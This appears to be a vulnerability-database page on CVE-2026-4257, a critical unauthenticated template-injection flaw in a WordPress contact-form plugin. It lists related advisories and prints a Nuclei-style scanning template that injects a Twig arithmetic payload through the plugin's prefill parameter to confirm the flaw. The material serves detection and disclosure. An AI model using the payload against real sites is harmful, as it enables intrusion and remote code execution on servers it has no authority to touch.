| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for CVE-2026-4257 | 18 Apr 202619:39 | – | githubexploit | |
| Exploit for CVE-2026-4257 | 11 May 202605:24 | – | githubexploit | |
| CVE-2026-4257 | 30 Mar 202621:26 | – | attackerkb | |
| CVE-2026-4257 | 30 Mar 202622:20 | – | circl | |
| WordPress plugin Contact Form by Supsystic 代码注入漏洞 | 30 Mar 202600:00 | – | cnnvd | |
| CVE-2026-4257 | 30 Mar 202621:26 | – | cve | |
| CVE-2026-4257 Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality | 30 Mar 202621:26 | – | cvelist | |
| WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI | 14 May 202600:00 | – | exploitdb | |
| EUVD-2026-17239 | 31 Mar 202600:31 | – | euvd | |
| Supsystic Contact Form Wordpress Plugin SSTI RCE | 26 May 202619:01 | – | metasploit |
id: CVE-2026-4257
info:
name: WordPress Contact Form by Supsystic - Server-Side Template Injection
author: theamanrawat
severity: critical
description: |
Contact Form by Supsystic WordPress plugin <= 1.7.36 contains a server-side template injection caused by unsandboxed Twig_Loader_String and cfsPreFill functionality, letting unauthenticated attackers execute arbitrary code remotely via GET parameters.
impact: |
Unauthenticated attackers can execute arbitrary PHP functions and OS commands remotely, leading to full server compromise.
remediation: |
Update to the latest version beyond 1.7.36.
reference:
- https://patchstack.com/database/vulnerability/wordpress-contact-form-by-supsystic-plugin-1-7-36-unauthenticated-server-side-template-injection-via-prefill-functionality-vulnerability
- https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323
- https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-4257
epss-score: 0.41475
epss-percentile: 0.98506
cwe-id: CWE-94
metadata:
max-request: 7
verified: true
vendor: supsystic
product: contact_form
framework: wordpress
shodan-query: http.component:"WordPress"
tags: cve,cve2026,wordpress,wp-plugin,contact-form-by-supsystic,ssti,rce,twig,unauth
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
payload: "%7B%7B{{num1}}*{{num2}}%7D%7D"
result: "{{to_number(num1)*to_number(num2)}}"
flow: |
http(1);
let found = [];
let seen = {};
for (let p of iterate(template["page-paths"])) {
if (!seen[p]) {
seen[p] = true;
found.push(p);
}
}
let defaults = ["/?page_id=2", "/?page_id=3", "/?page_id=4", "/?page_id=5", "/?page_id=6"];
for (let d of defaults) {
if (!seen[d]) {
seen[d] = true;
found.push(d);
}
}
for (let page of found) {
let sep = page.includes("?") ? "&" : "?";
set("pagepath", page + sep + "cfsPreFill=1&first_name={{payload}}");
if (http(2)) break;
}
http:
- method: GET
path:
- "{{BaseURL}}/"
extractors:
- type: regex
name: page-paths
internal: true
group: 1
regex:
- 'href="(?:https?://[^/"]+)?(/\?page_id=\d+)'
- 'href="(?:https?://[^/"]+)?(/[a-z][a-z0-9-]+/)'
part: body
- method: GET
path:
- "{{BaseURL}}{{pagepath}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="{{result}}"'
- type: word
part: body
words:
- 'contact-form-by-supsystic'
- type: status
status:
- 200
# digest: 490a0046304402205af1b0bc0edd3f84b2b97080f34a4ef8cfc98b07c4c69981d37626b50e2c0e9f0220021a722db5387f030dbbcd7522b3295597bb7a37dc124b801f93c3448b307de1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation